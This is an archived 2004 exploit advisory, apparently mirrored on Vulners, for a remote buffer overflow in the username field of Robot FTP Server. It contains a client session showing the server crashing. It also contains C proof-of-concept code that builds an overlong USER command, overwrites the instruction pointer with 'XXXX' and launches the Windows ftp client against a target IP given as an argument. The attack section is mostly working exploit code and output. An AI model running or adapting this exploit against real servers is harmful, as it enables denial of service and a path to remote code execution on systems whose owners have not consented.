Vulners
Lucene search
robotFTP.txt
`
Application: Robot FTP Server
http://www.robotftp.com/
Versions: 1.0/2.0 beta 1
Platforms: Windows NT
Bug: Buffer Overflow
Exploitation: remote
Date: 15 Feb 2004
Author: gsicht
e-mail: [email protected]
#######################################################################
1) Introduction
2) Bug
3) The Code
#######################################################################
===============
1) Introduction
===============
Quoute from the Robot ftp's website:
"RobotFTP server is an FTP server that will transform any windows computer into an FTP site and enable distribution of files to co-workers or friends.
Robotftp Server is extremely easy to setup and configure. You can create password protected or anonymous accounts, specify folders and files that are accessible for each account, and monitor activities of connected users."
#######################################################################
======
2) Bug
======
I found a buffer overflow vulnerability in Robotftp server in the username fiehlt that allowes remote command execution. I only found this vulnerability with the windows ftp client. It doesn't work with netcat or telnet.
C:\Dokumente und Einstellungen\Admin\Desktop>ftp localhost
220 Connected to RobotFTP Server
Benutzer (done:(none)): <AA...more than 47 A's...AA>
331 User name OK, send password as PASS
Kennwort:
530 User cannot log in
Anmeldung fehlgeschlagen.
ftp> Ungültiger Befehl
ftp> user <AA... about 2000 A's ...AA>
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
502 Command not implemented
Anmeldung fehlgeschlagen.
ftp> Ungültiger Befehl
CRASH!!!!!!
ftp> quit
C:\Dokumente und Einstellungen\Admin\Desktop>
#######################################################################
===========
3) The Code
===========
/******************************
this is example code for the vulnerability. It uses the windows ftp client to connect to a server
******************************/
#include <stdio.h>
char buffer[2500];
char cmd[50];
int main(int argc, char *argv[])
{
FILE *evil;
if(argv[1] == NULL)
{
printf("Usage: %s [IP]\n\n",argv[0]);
return 0;
}
memset(buffer,0x41,47);
memcpy(buffer+47,"\r\n",2);
memcpy(buffer+49,"crash",5);
memcpy(buffer+54,"\r\n",2);
memcpy(buffer+56,"USER ",5);
memset(buffer+61,0x41,1989);
memset(buffer+61+1989,0x58,4); // << overwrites the eip with XXXX
memcpy(buffer+65+1989,"\r\n",2);
sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);
if((evil = fopen("ftp.txt", "a+")) != NULL)
{
fputs(buffer, evil);
fclose(evil);
printf("- file written!\n");
}
else
{
fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
exit(1);
}
system(cmd);
}
/*******************************/
#######################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2004 00:00Current